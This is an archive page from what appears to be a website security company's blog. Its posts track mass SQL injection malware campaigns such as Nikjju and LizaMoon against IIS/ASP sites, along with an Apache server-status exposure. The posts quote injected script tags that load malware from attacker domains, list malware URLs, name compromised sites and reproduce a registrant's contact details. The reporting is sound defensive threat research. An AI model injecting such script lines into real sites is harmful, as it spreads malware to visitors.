Out-of-date Software Affects Websites Big and Small

November 5, 2012 by 3 Comments

Last week we published an article listing some big and popular websites that were leaking information about their users via the Apache server-status page. We also published a full list of sites that had this option enabled on our Labs project: URLFind.org.

On URLFind, we list a lot more details than just the sites that have server-status enabled. You can easily find sites that are running outdated versions of WordPress, Joomla or even vBulletin. We also index sites that are still running PHP 4 (outdated and not supported) and other potentially unsafe configurations and servers.

Message to all webmasters

After we published the blog post with the server-status issue, almost all of the sites got fixed (well, excluding Staples and Ford), which I don’t think they would have without that small push (walk of shame).

We are hoping that by shedding a bit more light to this already publicly exposed dilemma, webmasters will take note and update their sites and servers as soon as they can.

Read More

Filed Under: apache, iis, research, sucuri, vulnerability, WordPress Tagged With: , , , , ,

Nikjju SQL injection update (now hgbyju. com/r.php)

April 22, 2012 by 3 Comments

We posted a few days ago about a Mass SQL injection campaign that has been compromising thousands of sites. Our latest numbers show more than 200,000 pages got infected with the nikjju.com malware.

However, since the last two days, the attackers switched domain names and are now using hgbyju.com to distribute their malware (also hosted at 31.210.100.242). So the following code is now getting added to the compromised web sites:

<script src = http://hgbyju.com/r.php <</script>

This domain name was registered just a few days ago (April 17) by James Northone jamesnorthone@hotmailbox.com, same name/email used on nikjju.com and many other domains from similar malware campaigns (probably fake):

Registrant Contact:
JamesNorthone
James Northone jamesnorthone@hotmailbox.com
+1.5168222749 fax: +1.5168222749
128 Lynn Court
Plainview NY 11803
us

So they have been at this for a while with no sign at stopping.

Filed Under: hacked, iis, Malware, malware_updates Tagged With: , , ,

Nikjju Mass injection campaign (180k+ pages compromised)

April 17, 2012 by 16 Comments

Our research team have been tracking a new mass SQL injection campaign that started early this month. So far more than 180,000 URLs have been compromised. We will keep posting updates as we get them.

Nikjju is a mass SQL injection campaign targeting ASP/ASP.net sites (very similar to lizamoon from last year). When successful, it adds the following javascript to the compromised sites:

<script src= http://nikjju.com/r.php ></script>


Read More

Filed Under: hacked, iis, Malware, malware_updates Tagged With: , , ,

Mass infections from jjghui.com/urchin.js (SQL injection)

October 12, 2011 by 8 Comments

We are seeing many sites compromised with malware from jjghui.com/urchin.js. Most of them are IIS/ASP sites and the infection method seems to be similar to the Lizamoon mass infections from a few months ago (SQL injection).

According to Google, almost 1.5k sites have been blacklisted already due to it, and there are 80k+ pages on Google index with a JavaScript malware pointing to it.

What is interesting is that the registration information for this domain is the same as the one used on the earlier Lizamoon domains:

Read More

Filed Under: hacked, iis, Malware, malware_updates, vulnerability Tagged With: , , , ,

LizaMoon SQL injections (ur.php) – Now vcvsta.com, asweds.com, etc.

May 25, 2011 by 3 Comments

A couple of months ago the Lizamoon malware / Mass SQL injection was getting a lot of news coverage that it could be affecting hundreds of thousands of sites.

The media mostly forgot about it, but we kept tracking those attacks and they are continuing at full force, but using different domain names.

For example, the domain http://vcvsta.com/ur.php caused 1.5k sites to get blacklisted by Google:

Read More

Filed Under: hacked, iis, Malware, malware_updates Tagged With: , , ,

LizaMoon Mass SQL injection (ur.php) – Updates

April 4, 2011 by 3 Comments

There has been a lot of talk for the last few days about a mass sql injection targeting IIS/ASP.net sites.

Those attacks has been going for a while and the lizamoon.com/ur.php is not the only domain being used to distribute the malware, making the attack a lot bigger than what has been reported.

For example, the alisa-carter.com/ur.php caused more than 900 domains to get blacklisted and google reports more than 500k URLs infected with it.

These are just some of the other domains being used. If you search for each one on Google you will find thousands of references (all injected on IIS sites, using the same ur.php scheme and hosted on similar locations):

Read More

Filed Under: hacked, iis, Malware, malware_updates, vulnerability Tagged With: , , ,

Attacks against IIS/ASP sites – alisa-carter dot com

March 21, 2011 by 1 Comment

Over the last few days, we’ve seen a number of sites getting hacked with a malware script pointing to http://alisa-carter.com/ur.php . It is done using the same SQL injection attack as used in therobint-us mass infection a few months ago.

Multiple domains are being used to distribute the malware, including:

http://alisa-carter.com/ur.php

http://google-stats50.info/ur.php

http://pop-stats.info/ur.php

http://sol-stats.info/ur.php

http://online-guest.info/ur.php

http://google-stats48.info/ur.php

http://google-stats49.info/ur.php

http://google-stats50.info/ur.php

http://multi-stats.info/ur.php


Read More

Filed Under: blacklisted, hacked, iis Tagged With: , ,

Attack against IIS/ASP sites – google-stat50.info

September 28, 2010 by 2 Comments

A large number of sites have been hacked again in the last few days with a malware script pointing to google-stat50.info (and google-stats50.info) . Not only small sites, but some big ones got hit as well. It is the same SQL injection attack as used in the robint-us mass infection of a few months ago.

What do all these sites have in common? They are all hosted on IIS servers, using ASP.net and are vulnerable to SQL injection.

How many sites got infected? According to Google, at least 1,500 sites got hacked and blacklisted, but the number is a lot bigger, since not all the sites got checked by Google:

Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It infected 1577 domain(s), including asianpopcorn.com/, koreanmovie.com/, golfyou.net/.


Read More

Filed Under: blacklisted, hacked, iis, Malware Tagged With: , , ,

Mass infection of IIS/ASP sites – 2677.in/yahoo.js

June 11, 2010 by 13 Comments

A large number of sites have been hacked again in the last few hours with a malware script pointing to http://2677.in/yahoo.js . Not only small sites, but some big ones got hit as well. It is the same SQL injection attack as used in the robint-us mass infection of a few days ago.

Some of the sites hacked this time:

http://www.ameristar.com/

http://www.servicewomen.org

http://www.chicagopublicradio.org

http://www.industryweek.com

http://www.booksellerandpublisher.com.au

http://www.spain-holiday.com

This time Google says that around 1 thousand pages have been infected. This is the content of the yahoo.js script:

Read More

Filed Under: hacked, iis, Malware Tagged With: , , ,